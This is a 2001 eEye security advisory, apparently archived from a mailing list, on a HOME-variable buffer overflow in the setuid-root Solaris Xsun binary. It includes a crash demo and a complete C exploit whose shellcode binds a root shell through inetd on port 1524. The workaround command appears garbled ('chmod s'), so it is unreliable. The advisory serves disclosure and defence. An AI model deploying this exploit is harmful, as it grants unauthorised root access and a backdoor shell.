OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: eEye Digital Security (eeyeEEYE.COM)
Date: Tue Apr 10 2001 - 19:29:08 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Solaris Xsun buffer overflow vulnerability

    Discovered and exploited by:
    Riley Hassell rileyeeye.com

    Release Date:
    April 10, 2001

    Systems Affected:
    Solaris 7/8 (x86 and sparc)

    Description:
    Yet some more Solaris spring cleaning...

    A buffer overflow was discovered in Xsun. Since Xsun is SUID root,
    exploiting this vulnerability yields root privileges. The overflow exists in
    Xsuns handling of the HOME environment variable.

    bash-2.03$ HOME=`perl -e 'print "A"x1050'`
    bash-2.03$ /usr/openwin/bin/Xsun :1
    Warning: There is no XDISPLAY information for display 1.
    Server is using XDISPLAY information for display 0.
    Default Font Path: /usr/openwin/lib/X11/
    Segmentation Fault (core dumped)

    Proof of Concept:

    /***********************************/
    Solaris 7 (x86) /usr/openwin/bin/Xsun
    HOME environment overflow

    Proof of Concept Exploitation
    rileyeeye.com

    Puts a Root shell on local port 1524
    /***********************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #define BUFLEN 1041

    /* seteuid/setuid/inetd shell */
    char eyecode[] =
    "\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
    "\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
    "\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
    "\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
    "\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
    "\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
    "\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
    "\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
    "\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
    "\x68\x20\x2d\x63\x20"
    "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
    "/usr/sbin/inetd -s /tmp/eeye2001";

    char buf[BUFLEN];
    unsigned long int nop, esp;
    long int offset = 0;

    unsigned long int get_esp()
    {__asm__("movl %esp,%eax");}

    int main (int argc, char *argv[])
    {
            int i;
            if (argc > 1)
                    offset = strtol(argv[1], NULL, 0);
            else
                    offset = -200;
            esp = get_esp();
            memset(buf, 0x90, BUFLEN);
            memcpy(buf+800, eyecode, strlen(eyecode));
            *((int *) &buf[1037]) = esp+offset;
            strncpy(&buf[0],"HOME=",5);
            putenv(buf);
            execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
            return;
    }

    Vendor Status:
    Sun Microsystems has been contacted. They are currently working on patches
    for this and other related vulnerabilities eEye has discovered. We would
    like to thank them for working with us on creating a patch for this
    vulnerability.

    Workaround:
    chmod s /usr/openwin/bin/Xsun
    This will remove the setuid bit from Xsun, therefore if someone does exploit
    this vulnerability, they wont gain higher privileges.

    Greetings:
    ADM, Lamagra, Zen-Parse, Loki, and Speakeasy Networks

    Copyright (c) 1998-2001 eEye Digital Security
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alerteEye.com for
    permission.

    Disclaimer
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    infoeEye.com